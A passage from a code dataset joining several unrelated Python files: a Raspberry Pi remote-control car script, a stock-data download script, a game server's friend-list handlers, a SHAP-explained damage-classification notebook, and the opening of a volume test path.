response_event(setting, status, d1, d2, f1, f2)\n\n\nclass Settings:\n\n def __init__(self):\n self.f_1 = 6\n self.f_2 = 13\n self.d_1 = 19\n self.d_2 = 26\n\n self.sleep_time = 0.3\n self.der_sleep_time = 0.02\n self.d_duty_cycle = 100\n self.f_duty_cycle = 80\n\n\nclass Status:\n\n def __init__(self):\n self.forward_flag = False\n self.left_turn_flag = False\n self.right_turn_flag = False\n self.back_off_flag = False\n\n self.down_time1 = time.time()\n self.up_time1 = time.time()\n self.down_time2 = time.time()\n self.up_time2 = time.time()\n\n\ndef GPIO_init():\n GPIO.setmode(GPIO.BCM)\n for i in (6, 13, 19, 26):\n GPIO.setup(i, GPIO.OUT, initial=GPIO.LOW)\n\n\ndef check_event(status):\n for event in pygame.event.get():\n if event.type == pygame.QUIT or (event.type == pygame.KEYUP and event.key == pygame.K_ESCAPE):\n GPIO.cleanup()\n pygame.quit()\n sys.exit()\n else:\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_UP:\n status.forward_flag = True\n status.down_time1 = time.time()\n print(\"forward\")\n if event.key == pygame.K_LEFT:\n status.left_turn_flag = True\n print(\"forward and left\")\n if event.key == pygame.K_RIGHT:\n status.right_turn_flag = True\n print(\"forward and right\")\n if event.key == pygame.K_DOWN:\n status.back_off_flag = True\n status.down_time2 = time.time()\n print(\"back off\")\n elif event.type == pygame.KEYUP:\n if event.key == pygame.K_UP:\n status.forward_flag = False\n status.up_time1 = time.time()\n print(\"stop\")\n if event.key == pygame.K_LEFT:\n status.left_turn_flag = False\n print(\"stop left\")\n if event.key == pygame.K_RIGHT:\n status.right_turn_flag = False\n print(\"stop right\")\n if event.key == pygame.K_DOWN:\n status.back_off_flag = False\n status.up_time2 = time.time()\n print(\"stop back off\")\n else:\n pass\n\n\ndef slow_speed_up(setting, status, speed_io, zero_io, turn_flag=False):\n \"\"\"\n 匀加速,以免过载\n :param turn_flag:\n :param setting:\n :param status:\n :param speed_io:\n :param zero_io:\n :return:\n \"\"\"\n i = 0\n while status.down_time1 - status.up_time2 <= setting.sleep_time:\n i += int(setting.f_duty_cycle / (setting.sleep_time / setting.der_sleep_time))\n if turn_flag:\n if i > int(setting.f_duty_cycle/2):\n break\n else:\n if i > setting.f_duty_cycle:\n break\n speed_io.ChangeDutyCycle(i)\n zero_io.ChangeDutyCycle(0)\n time.sleep(setting.der_sleep_time)\n\n\ndef response_event(setting, status, d1, d2, f1, f2):\n if status.forward_flag:\n if status.back_off_flag:\n f1.ChangeDutyCycle(0)\n f2.ChangeDutyCycle(0)\n else:\n if status.left_turn_flag and status.right_turn_flag:\n slow_speed_up(setting, status, f1, f2)\n f1.ChangeDutyCycle(setting.f_duty_cycle)\n f2.ChangeDutyCycle(0)\n d1.ChangeDutyCycle(0)\n d2.ChangeDutyCycle(0)\n else:\n if status.left_turn_flag:\n slow_speed_up(setting, status, f1, f2, True)\n f1.ChangeDutyCycle(int(setting.f_duty_cycle/2))\n f2.ChangeDutyCycle(0)\n d1.ChangeDutyCycle(setting.d_duty_cycle)\n d2.ChangeDutyCycle(0)\n elif status.right_turn_flag:\n slow_speed_up(setting, status, f1, f2, True)\n f1.ChangeDutyCycle(int(setting.f_duty_cycle/2))\n f2.ChangeDutyCycle(0)\n d1.ChangeDutyCycle(0)\n d2.ChangeDutyCycle(setting.d_duty_cycle)\n else:\n if status.down_time1 - status.up_time2 <= setting.sleep_time:\n time.sleep(setting.sleep_time - (status.down_time1 - status.up_time2))\n slow_speed_up(setting, status, f1, f2)\n f1.ChangeDutyCycle(setting.f_duty_cycle)\n f2.ChangeDutyCycle(0)\n d1.ChangeDutyCycle(0)\n d2.ChangeDutyCycle(0)\n else:\n f1.ChangeDutyCycle(0)\n f2.ChangeDutyCycle(0)\n if status.back_off_flag:\n if status.left_turn_flag and status.right_turn_flag:\n slow_speed_up(setting, status, f2, f1)\n f1.ChangeDutyCycle(0)\n f2.ChangeDutyCycle(setting.f_duty_cycle)\n d1.ChangeDutyCycle(0)\n d2.ChangeDutyCycle(0)\n else:\n if status.left_turn_flag:\n slow_speed_up(setting, status, f2, f1, True)\n f1.ChangeDutyCycle(0)\n f2.ChangeDutyCycle(int(setting.f_duty_cycle/2))\n d1.ChangeDutyCycle(setting.d_duty_cycle)\n d2.ChangeDutyCycle(0)\n elif status.right_turn_flag:\n slow_speed_up(setting, status, f2, f1, True)\n f1.ChangeDutyCycle(0)\n f2.ChangeDutyCycle(int(setting.f_duty_cycle / 2))\n d1.ChangeDutyCycle(0)\n d2.ChangeDutyCycle(setting.d_duty_cycle)\n else:\n if status.down_time2 - status.up_time1 <= setting.sleep_time:\n time.sleep(setting.sleep_time - (status.down_time2 - status.up_time1))\n slow_speed_up(setting, status, f2, f1)\n f1.ChangeDutyCycle(0)\n f2.ChangeDutyCycle(setting.f_duty_cycle)\n d1.ChangeDutyCycle(0)\n d2.ChangeDutyCycle(0)\n\n else:\n d1.ChangeDutyCycle(0)\n d2.ChangeDutyCycle(0)\n f1.ChangeDutyCycle(0)\n f2.ChangeDutyCycle(0)\n\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"bmw_car_remote_control.py","file_name":"bmw_car_remote_control.py","file_ext":"py","file_size_in_byte":6961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"347955589","text":"\nimport baostock as bs\nimport pandas as pd\n\n#http://baostock.com/baostock/index.php/%E9%A6%96%E9%A1%B5官网\n\ndef 保存csv文件(保存路径,df):\n df.to_csv(保存路径,encoding='utf_8_sig',index=False)\n#### 登陆系统 ####\nlg = bs.login()\n# 显示登陆返回信息\nprint('login respond error_code:'+lg.error_code)\nprint('login respond error_msg:'+lg.error_msg)\n\n#### 获取沪深A股历史K线数据 ####\n# 详细指标参数,参见“历史行情指标参数”章节;“分钟线”参数与“日线”参数不同。“分钟线”不包含指数。\n# 分钟线指标:date,time,code,open,high,low,close,volume,amount,adjustflag\n# 周月线指标:date,code,open,high,low,close,volume,amount,adjustflag,turn,pctChg\nrs = bs.query_history_k_data_plus(\"sz.000778\",\n \"date,code,time,open,close\",\n start_date='2021-03-01', end_date='2021-03-03',\n frequency=\"5\", adjustflag=\"3\")\nprint('query_history_k_data_plus respond error_code:'+rs.error_code)\nprint('query_history_k_data_plus respond error_msg:'+rs.error_msg)\n\n#### 打印结果集 ####\ndata_list = []\nwhile (rs.error_code == '0') & rs.next():\n # 获取一条记录,将记录合并在一起\n data_list.append(rs.get_row_data())\ndf = pd.DataFrame(data_list, columns=rs.fields)\nprint(df)\n\n保存路径='C:/Users/YcAllenEffy/Desktop/222.csv'\n保存csv文件(保存路径,df)\n#### 登出系统 ####\nbs.logout()","sub_path":"其他学习_少量/量化交易学习/量化学习_baostock.py","file_name":"量化学习_baostock.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"447677879","text":"# -*- coding:utf-8 -*-\n\"\"\"\ncreated by server on 14-7-17下午4:36.\n\"\"\"\n\nfrom gfirefly.server.logobj import logger\nfrom gfirefly.server.globalobject import remoteserviceHandle\nfrom gfirefly.server.globalobject import GlobalObject\nfrom app.battle.battle_unit import BattleUnit\nfrom app.game.redis_mode import tb_character_info\nfrom app.game.redis_mode import tb_character_level\nfrom app.game.action.root.netforwarding import push_message\nfrom app.proto_file.common_pb2 import CommonResponse\nfrom shared.db_opear.configs_data import game_configs, data_helper\nfrom app.proto_file import friend_pb2\nfrom app.proto_file.db_pb2 import Heads_DB\nfrom app.proto_file.db_pb2 import Stamina_DB\nfrom shared.utils.date_util import is_next_day\nfrom app.game.core.item_group_helper import gain, get_return\nfrom app.game.core.mail_helper import send_mail\nfrom shared.utils.const import const\nfrom app.game.core.task import hook_task, CONDITIONId\nfrom app.game.redis_mode import tb_pvp_rank\nimport datetime\nimport random\nimport time\nfrom app.game.action.node._fight_start_logic import assemble\n\n\nremote_gate = GlobalObject().remote.get('gate')\n\n\n@remoteserviceHandle('gate')\ndef add_friend_request_1100(data, player):\n \"\"\" request to invite target as friend \"\"\"\n response = CommonResponse()\n response.result = True\n response.result_no = 0\n request = friend_pb2.FriendCommon()\n request.ParseFromString(data)\n\n if len(request.target_ids) < 1:\n response.result = False\n response.result_no = 11005 # fail\n return response.SerializePartialToString() # fail\n\n max_num_friend = game_configs.base_config.get('max_of_UserFriend')\n if len(player.friends.friends) >= max_num_friend:\n response.result = False\n response.result_no = 11003 # fail\n return response.SerializePartialToString() # fail\n\n target_id = request.target_ids[0]\n\n if target_id == player.base_info.id:\n response.result = False # cant invite oneself as friend\n response.result_no = 11004 # fail\n return response.SerializePartialToString() # fail\n\n if not push_message('add_friend_request_remote', target_id,\n player.base_info.id):\n response.result = False\n response.result_no = 11002\n return response.SerializePartialToString() # fail\n\n return response.SerializePartialToString()\n\n\n@remoteserviceHandle('gate')\ndef add_friend_respond_accept_1101(data, player):\n \"\"\" respond to inviter \"\"\"\n response = CommonResponse()\n response.result = True\n response.result_no = 0\n request = friend_pb2.FriendCommon()\n request.ParseFromString(data)\n\n for target_id in request.target_ids:\n if not player.friends.add_friend(target_id):\n response.result = False\n continue\n\n # save data\n player.friends.save_data()\n\n if not push_message('become_friends_remote',\n target_id,\n player.base_info.id):\n response.result = False\n\n send_mail(conf_id=301, nickname=player.base_info.base_name,\n receive_id=target_id)\n\n return response.SerializePartialToString()\n\n\n@remoteserviceHandle('gate')\ndef add_friend_respond_refuse_1102(data, player):\n \"\"\" refuse inviting \"\"\"\n response = CommonResponse()\n response.result = True\n response.result_no = 0\n request = friend_pb2.FriendCommon()\n request.ParseFromString(data)\n\n for target_id in request.target_ids:\n if not player.friends.del_applicant(target_id):\n response.result = False\n response.result_no += 1\n\n # save data\n player.friends.save_data()\n return response.SerializePartialToString()\n\n\n@remoteserviceHandle('gate')\ndef del_friend_request_1103(data, player):\n \"\"\" delete friend from friend list \"\"\"\n response = CommonResponse()\n response.result = True\n response.result_no = 0\n request = friend_pb2.FriendCommon()\n request.ParseFromString(data)\n for target_id in request.target_ids:\n if not player.friends.del_friend(target_id):\n response.result = False\n\n # save data\n player.friends.save_data()\n\n response.result = push_message('delete_friend_remote',\n target_id,\n player.base_info.id)\n response.result_no += 1\n\n return response.SerializePartialToString()\n\n\n@remoteserviceHandle('gate')\ndef add_black_list_1104(data, player):\n \"\"\" add a player to blacklist by id \"\"\"\n response = CommonResponse()\n response.result = True\n response.result_no = 0\n request = friend_pb2.FriendCommon()\n request.ParseFromString(data)\n\n for target_id in request.target_ids:\n if not player.friends.add_blacklist(target_id):\n response.result = False\n response.result_no += 1\n\n # save data\n player.friends.save_data()\n return response.SerializePartialToString()\n\n\n@remoteserviceHandle('gate')\ndef del_black_list_1105(data, player):\n \"\"\" delete a player from blacklist \"\"\"\n response = CommonResponse()\n response.result = True\n response.result_no = 0\n request = friend_pb2.FriendCommon()\n request.ParseFromString(data)\n\n for target_id in request.target_ids:\n if not player.friends.del_blacklist(target_id):\n response.result = False\n response.result_no += 1\n\n # save data\n player.friends.save_data()\n return response.SerializePartialToString()\n\n\ndef _with_battle_info(response, friend):\n # 添加好友主将的属性\n column = ['id', 'lord_attr_info', 'heads', 'nickname', 'vip_level',\n 'attackPoint', 'upgrade_time', 'level']\n friend_data = friend.hmget(column)\n if friend_data.get('lord_attr_info').get('info'):\n battle_unit = BattleUnit.loads(friend_data.get('lord_attr_info').get('info'))\n logger.debug(\"battle_unit %s\" % battle_unit)\n assemble(response.friend_info, battle_unit)\n logger.debug(response.friend_info)\n\n response.id = friend_data['id']\n\n friend_heads = Heads_DB()\n friend_heads.ParseFromString(friend_data['heads'])\n response.hero_no = friend_heads.now_head\n response.vip_level = friend_data['vip_level']\n response.level = friend_data['level']\n rank = tb_pvp_rank.zscore(friend_data['id'])\n if rank:\n response.b_rank = int(rank)\n\n if remote_gate.online_remote(friend_data['id']) == 0:\n response.last_time = friend_data['upgrade_time']\n\n response.nickname = friend_data['nickname']\n if friend_data['attackPoint']:\n response.power = int(friend_data['attackPoint'])\n\n\n@remoteserviceHandle('gate')\ndef get_player_friend_list_1106(data, player):\n response = friend_pb2.GetPlayerFriendsResponse()\n response.open_receive = player.stamina._open_receive\n\n # 小伙伴支援\n player.friends.check_time()\n # if is_next_day(time.time(), player.friends.fight_last_time):\n # # clear data in the next day\n # player.friends.fight_times = {}\n # player.friends.save_data()\n _update = False\n\n for pid in player.friends.friends + [player.base_info.id]:\n player_data = tb_character_info.getObj(pid)\n if player_data.exists():\n response_friend_add = response.friends.add()\n friend_data = player_data.hmget(['conditions_day', 'last_day'])\n response_friend_add.gift = player.friends.last_present_times(pid)\n\n conditions_day = friend_data.get('conditions_day', {})\n lively = conditions_day.get(24, 0)\n today = time.strftime(\"%Y%m%d\", time.localtime(time.time()))\n if today != time.strftime(\"%Y%m%d\", time.localtime(friend_data.get('last_day', '0'))):\n lively = 0\n response_friend_add.current = lively\n response_friend_add.target = game_configs.base_config['friendActivityValue']\n stat, update = player.friends.get_reward(pid, today)\n if update:\n _update = True\n response_friend_add.stat = stat\n\n # 添加好友主将的属性\n _with_battle_info(response_friend_add, player_data)\n response_friend_add.gift = player.friends.last_present_times(pid)\n response_friend_add.fight_last_time = int(player.friends.fight_times.get(pid, [0])[0])\n response_friend_add.fight_times = len(player.friends.fight_times.get(pid, []))\n else:\n logger.error('friend_list, cant find player id:%d' % pid)\n player.friends.friends.remove(pid)\n if _update:\n player.friends.save_data()\n\n for pid in player.friends.blacklist:\n player_data = tb_character_info.getObj(pid)\n if player_data.exists():\n response_blacklist_add = response.blacklist.add()\n\n # 添加好友主将的属性\n _with_battle_info(response_blacklist_add, player_data)\n else:\n logger.error('black_list cant find player id:%d' % pid)\n player.friends.blacklist.remove(pid)\n\n for pid in player.friends.applicant_list:\n player_data = tb_character_info.getObj(pid)\n if player_data.exists():\n response_applicant_list_add = response.applicant_list.add()\n\n # 添加好友主将的属性\n _with_battle_info(response_applicant_list_add, player_data)\n else:\n logger.error('applicant_list, cant find player id:%d' % pid)\n player.friends.applicant_list.remove(pid)\n\n logger.debug(\"response.friends %s\" % response.friends)\n return response.SerializePartialToString()\n\n\n@remoteserviceHandle('gate')\ndef draw_friend_lively_1199(data, player):\n request = friend_pb2.DrawRewardReq()\n request.ParseFromString(data)\n response = friend_pb2.DrawRewardRsp()\n response.fid = request.fid\n today = time.strftime(\"%Y%m%d\", time.localtime(time.time()))\n stat, update = player.friends.get_reward(request.fid, today)\n if stat:\n response.res.result = False\n response.res.result_no = 11991 # 已领取\n else:\n player_data = tb_character_info.getObj(request.fid)\n friend_data = player_data.hmget(['conditions_day', 'last_day'])\n conditions_day = friend_data.get('conditions_day', {})\n lively = conditions_day.get(24, 0)\n if today != time.strftime(\"%Y%m%d\", time.localtime(friend_data.get('last_day', '0'))):\n lively = 0\n if lively < game_configs.base_config['friendActivityValue']:\n logger.debug('error_no:11992,lively:%d' % lively)\n response.res.result = False\n response.res.result_no = 11992 # 未完成\n else:\n response.res.result = True\n reward = game_configs.base_config['friendActivityReward']\n lively_reward = data_helper.parse(reward)\n return_data = gain(player, lively_reward, const.LIVELY_REWARD) # 获取\n get_return(player, return_data, response.gain)\n player.friends.set_reward(request.fid, today, 1)\n update = True\n\n if update:\n player.friends.save_data()\n\n return response.SerializePartialToString()\n\n\ndef fill_friend_info(player_data, response):\n friend_data = player_data.hmget(['id',\n 'attackPoint',\n 'nickname',\n 'heads',\n 'level',\n 'upgrade_time'])\n response.id = friend_data.get('id')\n response.nickname = friend_data.get('nickname')\n if friend_data['attackPoint'] is not None:\n response.power = int(friend_data['attackPoint'])\n\n friend_heads = Heads_DB()\n friend_heads.ParseFromString(friend_data['heads'])\n response.hero_no = friend_heads.now_head\n response.level = friend_data['level']\n if remote_gate.online_remote(friend_data['id']) == 0:\n response.last_time = friend_data['upgrade_time']\n\n\n@remoteserviceHandle('gate')\ndef find_friend_request_1107(data, player):\n request = friend_pb2.FindFriendRequest()\n request.ParseFromString(data)\n\n response = friend_pb2.FindFriendResponse()\n if request.id_or_nickname.isdigit():\n player_data = tb_character_info.getObj(request.id_or_nickname)\n if player_data.exists():\n info = response.infos.add()\n info.gift = datetime.datetime.now().day\n fill_friend_info(player_data, info)\n\n nickname_obj = tb_character_info.getObj('nickname')\n isexist = nickname_obj.hexists(request.id_or_nickname)\n pid = nickname_obj.hget(request.id_or_nickname)\n player_data = tb_character_info.getObj(pid)\n if isexist:\n info = response.infos.add()\n info.gift = datetime.datetime.now().day\n fill_friend_info(player_data, info)\n\n return response.SerializePartialToString()\n\n\ndef get_recommend(player, up, down, recommend_num, response):\n front = player.base_info.level - down\n back = player.base_info.level + up\n uids = tb_character_level.zrangebyscore(front, back+1)\n count = 0\n # now = int(time.time())\n\n has_one = []\n for uid in uids:\n uid = int(uid)\n if uid == player.base_info.id:\n continue\n elif player.friends.is_friend(uid):\n continue\n elif uid in has_one:\n continue\n else:\n has_one.append(uid)\n\n player_data = tb_character_info.getObj(uid)\n isexist = player_data.exists()\n if count >= recommend_num:\n break\n\n if isexist:\n friend_data = player_data.hmget(['id', 'nickname',\n 'attackPoint', 'heads',\n 'level', 'upgrade_time'])\n if not friend_data.get('nickname'):\n continue\n count += 1\n friend = response.rfriend.add()\n friend.id = friend_data.get('id')\n friend.nickname = friend_data.get('nickname')\n if friend_data['attackPoint'] is not None:\n friend.power = int(friend_data['attackPoint'])\n\n friend_heads = Heads_DB()\n friend_heads.ParseFromString(friend_data['heads'])\n friend.hero_no = friend_heads.now_head\n\n friend.level = friend_data['level']\n friend.b_rank = 1\n if remote_gate.online_remote(friend_data['id']) == 0:\n friend.last_time = friend_data['upgrade_time']\n friend.fight_last_time = player.friends.fight_times.get(uid, [0])[0]\n friend.fight_times = len(player.friends.fight_times.get(uid, []))\n\n # 添加好友主将的属性\n _with_battle_info(friend, player_data)\n return count\n\n\n@remoteserviceHandle('gate')\ndef recommend_friend_1198(data, player):\n response = friend_pb2.RecommendRes()\n x = game_configs.base_config['friendApplyLevelGap']\n front = player.base_info.level - x\n back = player.base_info.level + x\n uids = tb_character_level.zrangebyscore(front, back+1)\n statics = game_configs.base_config['FriendRecommendNum']\n add_count_conf = game_configs.base_config.get('friendApplyLevelGapAdd', 5)\n player_level_max = game_configs.base_config['player_level_max']\n count = 0\n now = int(time.time())\n\n has_one = []\n add_count = 1\n while True:\n for uid in uids:\n uid = int(uid)\n if uid == player.base_info.id:\n continue\n elif player.friends.is_friend(uid):\n continue\n elif uid in has_one:\n continue\n else:\n has_one.append(uid)\n\n player_data = tb_character_info.getObj(uid)\n isexist = player_data.exists()\n if count >= statics:\n break\n\n if isexist:\n last_time = player_data.hget('upgrade_time')\n if now - last_time > game_configs.base_config['friendApplyOfflineDay']*24*60*60:\n continue\n friend_data = player_data.hmget(['id', 'nickname',\n 'attackPoint', 'heads',\n 'level', 'upgrade_time'])\n if not friend_data.get('nickname'):\n continue\n count += 1\n friend = response.rfriend.add()\n friend.id = friend_data.get('id')\n friend.nickname = friend_data.get('nickname')\n ap = 1\n if friend_data['attackPoint'] is not None:\n ap = int(friend_data['attackPoint'])\n friend.power = ap if ap else 0\n\n friend_heads = Heads_DB()\n friend_heads.ParseFromString(friend_data['heads'])\n friend.hero_no = friend_heads.now_head\n\n friend.level = friend_data['level']\n friend.b_rank = 1\n if remote_gate.online_remote(friend_data['id']) == 0:\n friend.last_time = friend_data['upgrade_time']\n\n # 添加好友主将的属性\n _with_battle_info(friend, player_data)\n if count >= statics:\n break\n else:\n front = front - add_count*add_count_conf\n back = back + add_count*add_count_conf\n if front <= 0:\n front = 1\n if back > player_level_max:\n back = player_level_max\n uids = tb_character_level.zrangebyscore(front, back+1)\n if back >= player_level_max and front <= 1:\n break\n\n return response.SerializePartialToString()\n\n\n@remoteserviceHandle('gate')\ndef given_stamina_1108(data, player):\n response = CommonResponse()\n response.result = True\n response.result_no = 0\n request = friend_pb2.FriendCommon()\n request.ParseFromString(data)\n\n target_id = request.target_ids[0]\n\n player_data = tb_character_info.getObj(target_id)\n stamina_db = Stamina_DB()\n stamina_db.ParseFromString(player_data.hget('stamina'))\n open_receive = stamina_db.open_receive\n\n if not player.friends.given_stamina(target_id, if_present=open_receive):\n response.result = False\n response.result_no = 1 # fail\n return response.SerializePartialToString() #\n\n player.friends.save_data()\n hook_task(player, CONDITIONId.SEND_STAMINA, 1)\n return response.SerializePartialToString()\n\n\n@remoteserviceHandle('gate')\ndef add_friend_request_remote(target_id, is_online, player):\n logger.debug('add friend request:%s, %s', is_online, target_id)\n result = player.friends.add_applicant(target_id)\n # assert(result)\n player.friends.save_data()\n if is_online:\n remote_gate.push_object_remote(1110,\n player.base_info.id,\n [player.dynamic_id])\n return True\n\n\n@remoteserviceHandle('gate')\ndef become_friends_remote(target_id, is_online, player):\n result = player.friends.add_friend(target_id, False)\n # assert(result)\n player.friends.save_data()\n hook_task(player, CONDITIONId.ADD_FRIEND, 1)\n return True\n\n\n@remoteserviceHandle('gate')\ndef open_friend_receive_1061(data, player):\n \"\"\" 开启好友活力赠送\n @author: jiang\n \"\"\"\n response = CommonResponse()\n player.stamina.open_receive()\n player.stamina.save_data()\n response.result = True\n return response.SerializePartialToString()\n\n\n@remoteserviceHandle('gate')\ndef close_friend_receive_1062(data, player):\n \"\"\" 关闭好友活力赠送\n @author: jiang\n \"\"\"\n response = CommonResponse()\n player.stamina.close_receive()\n player.stamina.save_data()\n response.result = True\n return response.SerializePartialToString()\n\n\n@remoteserviceHandle('gate')\ndef delete_friend_remote(target_id, is_online, player):\n result = player.friends.del_friend(target_id)\n player.friends.save_data()\n return result\n\n\n@remoteserviceHandle('gate')\ndef add_blacklist_request_remote(target_id, is_online, player):\n result = player.friends.add_blacklist(target_id)\n player.friends.save_data()\n return result\n\n\n@remoteserviceHandle('gate')\ndef get_recommend_friend_list_1109(data, player):\n response = friend_pb2.RecommendRes()\n num = get_recommend(player, 5, 0, 10, response)\n if num < 10:\n response = friend_pb2.RecommendRes()\n get_recommend(player, 5, 5, 10, response)\n\n return response.SerializePartialToString()\n","sub_path":"app/game/action/node/friend.py","file_name":"friend.py","file_ext":"py","file_size_in_byte":20553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"164787921","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Sep 25 14:22:20 2020\n\n@author: bruno\n\"\"\"\n\n# To add a new cell, type '# %%'\n# To add a new markdown cell, type '# %% [markdown]'\n# %% [markdown]\n# # SHM modelo predição de dano explicado pelo SHAP\n\n# %%\nimport pandas as pd\nimport numpy as np\nimport shap\nimport os\nimport matplotlib.pyplot as plt\n\n# ## Leitura da base de dados\n# %%\ndiretorio = 'Pasta de Dados/Validos/'\nquantidadeamostras = 20\nquantidadeniveis = 3\nquantidadetemperaturas = 7\nquantidadepzt = 3\n\ndirec = os.listdir(diretorio)\n# %%\ntemperaturas = {1:-10, 2:0, 3:10, 4:20, 5:30, 6:40, 7:50}\nvalues = pd.qcut(np.arange(2000),20, labels=np.arange(20).tolist())\nmapping = dict(list(enumerate(values)))\nk=0\nfor i in direc:\n for niv in range(quantidadeniveis):\n plt.figure(niv+k)\n for j in range(1,quantidadetemperaturas+1):\n #print(diretorio+'/'+i+'/'+i+'T'+str(j)+'.csv')\n locals()[i+'_T'+str(j)] = pd.read_csv(diretorio+'/'+i+'/'+i+'T'+str(j)+'.csv',header=None,delimiter=' ').T\n aux_std = eval(i+'_T'+str(j)).groupby(mapping, axis = 1).std()\n aux_std.columns = aux_std.columns+20\n locals()[i+'_T'+str(j)] = pd.concat([eval(i+'_T'+str(j)).groupby(mapping, axis = 1).mean(), aux_std], axis=1)\n print(i+'_T'+str(j))\n for niv in range(quantidadeniveis):\n plt.figure(niv+k)\n plt.plot(eval(i+'_T'+str(j)).loc[0,:],eval(i+'_T'+str(j)).loc[1+quantidadeamostras*niv:quantidadeamostras+1+quantidadeamostras*niv,:].mean())\n plt.title(str(niv)+' '+i)\n #eval(i+'_T'+str(j)).loc[:,'temp'] = temperaturas[j]\n k=k+quantidadeniveis\n\n# %% [markdown]\n# ### Construindo os dados de treino e validação\n# %%\nfor i in ['PZT3_T1','PZT3_T2','PZT3_T3','PZT6_T1','PZT6_T2','PZT6_T3','PZT7_T1','PZT7_T2','PZT7_T3']:\n #eval(i).loc[0, 'target'] = 11111\n for niv in range(quantidadeniveis):\n eval(i).loc[1+quantidadeamostras*niv:quantidadeamostras+1+quantidadeamostras*niv, 'target'] = int(niv)\n eval(i).dropna(inplace=True)\neval(i).describe()\n\n# %% [markdown]\n# ### separando os dados de treino e validação\n# sinais = pd.concat([PZT3_T1,PZT3_T2, PZT3_T3])\n# sinais =sinais.sample(frac=1).reset_index(drop=True)\n# features = sinais.drop(columns=['target'])\n# y = sinais['target']\n# y.value_counts()\n\n# from sklearn.model_selection import train_test_split\n# Xtrain, Xval, ytrain, yval = train_test_split(features, y, train_size=0.5)\n\n# Xtrain.shape, Xval.shape, ytrain.shape, yval.shape\n\n# yval.value_counts()\n\n# Xtrain.columns\n\n# %%\nimport seaborn as sns\ncorr = sinais.corr()\n# plot the heatmap\nfig_dims = (25, 20)\nfig, ax = plt.subplots(figsize=fig_dims)\nsns.heatmap(corr, \n xticklabels=corr.columns,\n yticklabels=corr.columns,\n annot=True, fmt=\".2f\", ax=ax, cmap='RdYlBu')\n# %%\nfrom pycaret.classification import *\nexp_clf102 = setup(data = sinais, target = \"target\", session_id=123)\n\n# %% [markdown]\n# ### Para acessar os dados de treino e teste deve acessar da seguinte forma \n# #### Xteste = exp_clf102 \\[3\\]\n# #### yteste = exp_clf102 \\[5\\]\n\n# %%\nbest_model = compare_models()\nprint(best_model)\n\n# %% [markdown]\n# ### Precision:\n# Todo mundo que era da classe 1 quantos % foi previstos sendo da classe 1\n# ### recall:\n# Todos os exemplos da classe 1 quantos % foram detectados\n# ### f1-score\n# Média armonica entre precision e recall\n# \n\n# %%\nknn = create_model('knn')\ntuned_knn = tune_model(knn)\nprint(tuned_knn)\n\nplot_model(tuned_knn, plot = 'auc')\n\nplot_model(tuned_knn, plot = 'pr')\n\nplot_model(tuned_knn, plot = 'confusion_matrix')\n\n\n# %%\nimport shap\n\n# load JS visualization code to notebook\nshap.initjs()\n\n# %% [markdown]\n# ### Criando o explainer que é um objeto que representa o modelo\n# ### E o shap_values que é uma lista com 2 arrays para cada exemplo treinado, e apresenta a probabilidade de ser da classe 1 para o primeiro array e probabilidade de ser da classe 2 para o array 2 \n\n# %%\nexplainer = shap.KernelExplainer(tuned_knn.predict_proba, exp_clf102[2])\nshap_values = explainer.shap_values(Xtrain)\nshap_values[1].shape\n\n# %% [markdown]\n# ### Expected_values são as previsoes médias feitas pelo explainer para cada dado treinado\n\n# %%\nprint('Dados de treino: ' )\n# Xtrain\n#print(exp_clf102[2])\n# Ytrain\nprint(exp_clf102[4].values)\n\n\n# %%\nprint('Dados de treino: ' )\n# Xtrain\n#print(exp_clf102[3])\n# Ytrain\nprint(exp_clf102[5].values)\n\n\n# %%\nprint('Previsoes do modelo: ')\nprint(tuned_knn.predict(exp_clf102[3]))\n\n\n# %%\nexplainer.expected_value\n\n# %% [markdown]\n# ### Classe 2 - dano 2 para a instancia 0\n# Probabilidade de pertencer a classe de dano 2\n\n# %%\nshap.force_plot(explainer.expected_value[2], shap_values[2][0,:], Xtrain.iloc[0,:])\n\n# %% [markdown]\n# ### Classe 1 - dano 1 para a instancia 0\n# Probabilidade de pertencer a classe de dano 1\n\n# %%\nshap.force_plot(explainer.expected_value[1], shap_values[1][0,:], Xtrain.iloc[0,:])\n\n# %% [markdown]\n# ### Classe 0 - baseline para a instancia 0\n# Probabilidade de pertencer a classe de baseline\n\n# %%\nshap.force_plot(explainer.expected_value[0], shap_values[0][0,:], Xtrain.iloc[0,:])\n\n\n# %%\nshap.force_plot(explainer.expected_value[1], shap_values[1], Xtrain)\n\n# %% [markdown]\n# ## Features mais importantes do modelo\n# #### Cor: vermelho: maior que amédia\n# #### Cor: azul: menor que a média\n# Eixo x é o impacto na previsão (empurrando pra cima + ou para baixo -)\n\n# %%\nshap.summary_plot(shap_values[1], Xtrain)\n\n\n# %%\nshap.dependence_plot(15, shap_values[0], Xtrain, interaction_index=3)\n\n\n# %%\n\n\n\n","sub_path":"Dados - Experimento com Porcas - 3 Vigas de Aço/modelo_shap_SHM_pycaret.py","file_name":"modelo_shap_SHM_pycaret.py","file_ext":"py","file_size_in_byte":5564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"350287084","text":"import zstackwoodpecker.test_state as ts_header\nTestAction = ts_header.TestAction\ndef path():\n return dict(initial_formation=\"template1\",\\\n path_list=[[TestAction.delete_volume, \"vm1-volume1\"], \\\n\t\t[TestAction.delete_volume, \"vm1-volume2\"], \\\n\t\t[TestAction.delete_volume, \"vm1-volume3\"], \\\n\t\t[TestAction.delete_volume, \"vm1-volume4\"], \\\n\t\t[TestAction.delete_volume, \"vm1-volume5\"], \\\n\t\t[TestAction.delete_volume, \"vm1-volume6\"], \\\n\t\t[TestAction.delete_volume, \"vm1-volume7\"], \\\n\t\t[TestAction.delete_volume, \"vm1-volume8\"], \\\n\t\t[TestAction.create_volume, \"volume1\", \"=scsi,shareable\"], \\\n [TestAction.attach_volume, \"vm1\", \"volume1\"], \\\n [TestAction.create_volume, \"volume2\", \"=scsi,shareable\"], \\\n [TestAction.attach_volume, \"vm1\", \"volume2\"], \\\n [TestAction.create_volume, \"volume3\", \"=scsi,shareable\"], \\\n [TestAction.attach_volume, \"vm1\", \"volume3\"], \\\n 